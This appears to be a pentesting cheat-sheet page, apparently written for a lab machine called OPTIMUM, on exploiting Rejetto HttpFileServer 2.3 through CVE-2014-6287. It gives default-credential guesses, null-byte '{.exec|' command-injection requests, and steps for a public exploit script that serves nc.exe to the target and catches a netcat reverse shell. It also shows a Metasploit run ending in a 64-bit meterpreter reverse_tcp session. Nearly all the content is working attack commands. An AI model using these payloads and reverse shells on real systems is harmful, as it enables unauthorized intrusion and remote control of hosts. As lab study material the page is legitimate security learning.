HttpFileServer (HFS)
Basics
Webserver designed for publishing and sharing files
Developed by Rejetto
http://10.x.x.x .. Port 80 HttpFileServer (HFS 2.3)Password Guessing
admin:admin
admin:password
root:password
root:root
admin:fileserverHFS 2.3 Remote Command Execution (RCE)
Vulnerable to remote code execution attacks
Due to a poor regex in the file ParserLib.pas
Execute arbitrary programs using %00 (null byte) sequence in a search action.
Which terminates the regular expression but not the entire string.
HFS has settings to secure against searching with { } . |
Explore HFS
Google: HTTPFileServer Exploit
GET /?search=%00 HTTP/1.1 ..original
GET /?search=%00{.exec|ping 10.10.10.14 HTTP/1.1 ..ping
GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1 ..better
tcpdump -i tun0 ..confirm pingsEasy Exploit (no msf)
searchsploit rejetto
vim 39161.py ..fix localip/port
cp nc.exe . ..prep payload
python -m SimpleHTTPServer 80 ..share
http://$MyIP:80/nc.exe ..confirm path
python 39161.py <IP> <Port> ..method
python 39171.py 10.x.x.x 80 ..exploit (try 4x)
nc -nvlp 4444 ..listenRejetto v2.3 RCE - Metasploit
rejetto_hfs_exec
CVE-2014-6287
--------------------
Google
httpfileserver vulnerability
httpfileserver metasploit
httpfileserver CVE
Found... "Remote Code Execution", Rejetto, CVE-2014-6287
--------------------
Metasploit
> searchsploit HTTPFileServer .. nothing
> searchsploit HFS .. Rejetto HTTP v2.3
> msfconsole
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> show options
> set RHOST $IP
> set LHOST $MyIP
> set SRVHOST $MyIP
> set LPORT 5555
> runMeterpreter 64
Session is 32 bit, but Server is 64
Set a new Payload
> sysinfo
Computer: OPTIMUM
OS: Windows 2012 R2
Arch: x64 ..64 bit
Meterpreter: x86/Windows ..32 bit
> background
msf> show options
msf> set payload windows/x64/meterpreter/reverse_tcp ..new Payload
msf> set LPORT 51001 ..new Port
msf> run ..connected!Last updated
Was this helpful?